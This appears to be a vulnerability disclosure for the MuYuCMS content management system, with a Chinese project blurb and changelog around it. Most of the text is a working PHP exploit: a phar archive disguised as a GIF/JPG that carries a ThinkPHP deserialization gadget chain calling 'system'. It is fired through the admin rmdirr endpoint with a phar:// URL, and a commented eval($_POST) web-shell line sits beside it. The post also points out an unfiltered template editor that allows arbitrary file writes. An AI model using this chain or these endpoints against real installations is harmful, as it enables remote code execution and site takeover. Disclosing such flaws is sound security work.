MuYuCMS基于Thinkphp开发的一套轻量级开源内容管理系统,专注为公司企业、个人站长提供快速建站提供解决方案。
MuYuCMS遵循Apache2开源协议发布,并提供免费使用。 部分代码来自互联网,若有异议,可以联系作者进行删除。
vulnerability in application/admin/controller/Update.php
we can upload phar files disguised as jpg in the background to further expand the attack surface.
POC:
<?php
namespace think{
abstract class Model{
protected $append;
private $data;
function __construct(){
$this->append = ["aaaa"=>["123456"]];
$this->data = ["aaaa"=>new Request()];
}
}
class Request
{
protected $param;
protected $hook;
protected $filter;
protected $config;
function __construct(){
$this->filter = "system";
$this->config = ["var_ajax"=>''];
$this->hook = ["visible"=>[$this,"isAjax"]];
$this->param = ["calc"];
}
}
}
namespace think\process\pipes{
use think\model\Pivot;
class Windows
{
private $files;
public function __construct()
{
$this->files=[new Pivot()];
}
}
}
namespace think\model{
use think\Model;
class Pivot extends Model
{
}
}
namespace{
use think\process\pipes\Windows;
@unlink('shell.jpg');
$phar = new Phar("shell.phar"); //
$phar->startBuffering();
$phar -> setStub('GIF89a'.'<?php __HALT_COMPILER();?>');
$object = new Windows();
//$object ->haha= 'eval(@$_POST[\'a\']);';
// $object ->haha= 'phpinfo();';
$phar->setMetadata($object);
$phar->addFromString("a", "a"); //添加要压缩的文件
$phar->stopBuffering();
echo (base64_encode(serialize(new Windows())));
}
?>
change filename to 'shell.jpg' and upload
final:
http://Youripaddress/admin.php/update/rmdirr?dirname=phar://./public/upload/menubg/613359e2251d3.jpg
vulnerability in application/admin/controller/Template.php
In fact,here is no any filtering,You can edit what you want
After edit,the file will atuo saved in :template/,you can access it directly
😀UEditor更换至CKeditor 😁修复自定义单页问题 😂修复前后端内容XSS/SQL过滤 🤣修复标签库逻辑问题 😃修复在线更新问题 😄修复支付逻辑问题 😅修复模型新增下载地址后相关内容无法编辑问题 😆修复评论提交逻辑问题 😉修复栏目添加选择模型问题以及子栏目逻辑问题 😋完善授权用户实时更新状态 😎完善函数库函数 😍新增内容/评论/栏目非标签数据请求方法
Source code(tar.gz)